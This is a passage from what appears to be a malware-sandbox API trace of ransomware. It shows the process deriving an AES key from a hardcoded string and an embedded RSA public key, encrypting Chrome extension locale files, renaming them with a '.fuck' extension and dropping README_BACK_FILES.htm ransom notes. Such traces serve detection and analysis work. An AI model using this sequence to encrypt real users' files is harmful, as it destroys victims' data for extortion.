"c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.053] GetFileType (hFile=0x5d64) returned 0x1 [0259.053] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.054] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.054] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0259.055] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.055] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.055] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.055] GetLastError () returned 0x0 [0259.055] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json")) returned 0x20 [0259.055] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json", dwFileAttributes=0x80) returned 1 [0259.055] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.056] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.057] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.057] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.059] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.059] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.059] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.059] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c780) returned 1 [0259.059] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.059] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.059] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6caa8) returned 1 [0259.060] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6caa8, dwCertEncodingType=0x1, pInfo=0x2e263b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e263e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e263e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c1c0) returned 1 [0259.060] CryptEncrypt (in: hKey=0x2e7c1c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.060] CryptEncrypt (in: hKey=0x2e7c1c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6ca20*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6ca20*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.060] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6ca20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6ca20*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.061] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x269, lpOverlapped=0x0) returned 1 [0259.068] CryptEncrypt (in: hKey=0x2e7c780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x269, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x270) returned 1 [0259.068] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x270, lpOverlapped=0x0) returned 1 [0259.080] CloseHandle (hObject=0x5d5c) returned 1 [0259.080] CloseHandle (hObject=0x5d60) returned 1 [0259.080] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json"), bFailIfExists=0) returned 1 [0259.085] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json", dwFileAttributes=0x0) returned 1 [0259.085] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json.gsg")) returned 1 [0259.086] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json.fuck")) returned 1 [0259.087] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0259.087] CryptDestroyKey (hKey=0x2e7c780) returned 1 [0259.087] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.088] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.088] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0259.088] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\readme_back_files.htm")) returned 0xffffffff [0259.088] AreFileApisANSI () returned 1 [0259.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 160 [0259.088] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.089] GetFileType (hFile=0x5d64) returned 0x1 [0259.089] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.090] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.090] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.091] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.091] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.091] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.091] GetLastError () returned 0x0 [0259.091] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json")) returned 0x20 [0259.091] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json", dwFileAttributes=0x80) returned 1 [0259.091] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.092] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.093] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.093] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.095] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.095] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.095] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.095] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c240) returned 1 [0259.095] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.095] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.095] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6c1a0) returned 1 [0259.096] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6c1a0, dwCertEncodingType=0x1, pInfo=0x2e26070*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e260a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e260a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c500) returned 1 [0259.096] CryptEncrypt (in: hKey=0x2e7c500, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.096] CryptEncrypt (in: hKey=0x2e7c500, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6cb30*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6cb30*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.096] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6cb30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6cb30*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.097] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x2b8, lpOverlapped=0x0) returned 1 [0259.099] CryptEncrypt (in: hKey=0x2e7c240, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2b8, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2c0) returned 1 [0259.099] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2c0, lpOverlapped=0x0) returned 1 [0259.110] CloseHandle (hObject=0x5d60) returned 1 [0259.110] CloseHandle (hObject=0x5d5c) returned 1 [0259.110] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json"), bFailIfExists=0) returned 1 [0259.113] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json", dwFileAttributes=0x0) returned 1 [0259.113] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.gsg")) returned 1 [0259.114] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.fuck")) returned 1 [0259.115] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.115] CryptDestroyKey (hKey=0x2e7c240) returned 1 [0259.116] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.116] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.116] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.116] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\readme_back_files.htm")) returned 0xffffffff [0259.116] AreFileApisANSI () returned 1 [0259.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.116] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.117] GetFileType (hFile=0x5d64) returned 0x1 [0259.117] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.118] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.118] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.118] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.118] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.118] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.118] GetLastError () returned 0x0 [0259.118] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json")) returned 0x20 [0259.118] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json", dwFileAttributes=0x80) returned 1 [0259.119] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.120] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.120] SetFileAttributesA 